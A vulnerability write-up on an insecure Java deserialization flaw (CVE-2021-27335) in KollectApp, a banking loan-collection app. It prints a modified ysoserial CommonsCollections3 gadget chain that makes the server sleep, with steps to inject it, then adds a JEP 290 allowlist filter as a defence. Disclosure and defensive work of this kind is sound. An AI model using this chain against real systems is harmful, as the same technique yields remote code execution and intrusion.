KollectApps Insecure Java Deserialization (CVE-2021-27335)
KollectApp is a desktop application used heavily in the banking sector; it is used to manage the collection of loans that the bank has given to customers.
While performing a penetration test on the application, I discovered a critical insecure Java deserialization vulnerability that leads to remote code execution.
During testing, I noticed a Java serialized payload in one of the application's requests.


Since I had decompiled the application's jar files, I knew that the Commons Collections gadget was present. I therefore generated a ysoserial payload that should make the application sleep and copied it into the request body; unfortunately, it did not work.
The reason is that ysoserial builds its payload around Runtime.getRuntime().exec("sleep(20000)").
The process launched by Runtime.exec runs asynchronously, outside the thread that is deserializing the request, so the request itself is never delayed.
For the sleep to be observable, java.lang.Thread.sleep(20) has to be used instead,
which blocks the deserializing thread itself; the application then sleeps for 20 seconds.
Below is the proof-of-concept code used to replace the getObject method in ysoserial's CommonsCollections3.java.
```java
// Drop-in replacement for getObject() in ysoserial's CommonsCollections3.java; the class's
// existing imports cover every type used here. The chain ends in Thread.sleep(command) on the
// deserializing thread, so the delay shows up in the response time.
public BadAttributeValueExpException getObject(final String command) throws Exception {
    // the sleep duration in milliseconds, the single argument for Thread.sleep(long)
    final Object[] execArgs = new Object[] { Long.parseLong(command) };
    // inert chain for setup
    final Transformer transformerChain = new ChainedTransformer(
            new Transformer[] { new ConstantTransformer(1) });
    // real chain for after setup: Thread.class -> getMethod("sleep", long) -> invoke(..., execArgs)
    final Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(java.lang.Thread.class),
            new InvokerTransformer("getMethod", new Class[] {
                    String.class, Class[].class }, new Object[] {
                    "sleep", new Class[] { long.class } }),
            // the receiver argument is ignored for the static sleep method
            new InvokerTransformer("invoke", new Class[] {
                    Object.class, Object[].class }, new Object[] {
                    new Class[] { long.class }, execArgs }),
            new ConstantTransformer(1) };
    final Map innerMap = new HashMap();
    final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
    // TiedMapEntry.hashCode()/toString() triggers lazyMap.get("foo"), which runs the chain
    TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
    // BadAttributeValueExpException.readObject() calls toString() on its val field
    BadAttributeValueExpException val = new BadAttributeValueExpException(null);
    Field valfield = val.getClass().getDeclaredField("val");
    valfield.setAccessible(true);
    valfield.set(val, entry);
    Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
    return val;
}
```
Finally, compile the modified file, run ysoserial again to generate a Java serialized payload with the CommonsCollections3 gadget, and insert the generated payload into the request body.


This causes the application to sleep for 20 seconds, as shown in the screenshot below.
The vulnerability was reported to the vendor, who swiftly released a fix.
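For the defensive side, here is an added example (not the vendor's fix and not part of the original post): a JEP 290 ObjectInputFilter, available since Java 9, that admits only an allowlist of classes, so a Commons Collections chain like the one above is rejected before any Transformer is instantiated. The allowlist, the limits and the two sample payloads are constructed for the demo.

```java
import java.io.*;
import java.util.*;
// Added example (not the vendor's fix): a JEP 290 ObjectInputFilter (Java 9+) that admits only an
// allowlist of classes, so a CommonsCollections chain (ChainedTransformer, InvokerTransformer,
// LazyMap, TiedMapEntry, BadAttributeValueExpException) is rejected before it is instantiated.
public class SafeDeserializer {
    // Constructed allowlist: the only types this endpoint is expected to exchange. Serializable
    // superclasses (here java.lang.Number for Long) are filtered as well and must be listed.
    private static final Set<String> ALLOWED =
        Set.of("java.util.ArrayList", "java.lang.Long", "java.lang.Number");

    static final ObjectInputFilter FILTER = info -> {
        // Cap graph depth, back-references and array sizes to blunt resource-exhaustion payloads.
        if (info.depth() > 10 || info.references() > 1_000 || info.arrayLength() > 10_000) {
            return ObjectInputFilter.Status.REJECTED;
        }
        Class<?> c = info.serialClass();
        if (c == null) return ObjectInputFilter.Status.UNDECIDED; // limits-only callback, no class
        while (c.isArray()) c = c.getComponentType();             // judge arrays by element type
        return c.isPrimitive() || ALLOWED.contains(c.getName())
            ? ObjectInputFilter.Status.ALLOWED
            : ObjectInputFilter.Status.REJECTED;                  // gadget classes land here
    };

    // Deserializes untrusted bytes under the filter; a rejected class raises InvalidClassException.
    public static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: a legitimate list of longs, then a HashMap standing in for the
        // LazyMap gadget (any class outside the allowlist is handled identically).
        System.out.println("benign: " + readFiltered(serialize(new ArrayList<>(List.of(20000L)))));
        try {
            readFiltered(serialize(new HashMap<String, String>()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same filter can be installed process-wide with `ObjectInputFilter.Config.setSerialFilter` or the `jdk.serialFilter` system property, which covers deserialization paths the application code does not call directly.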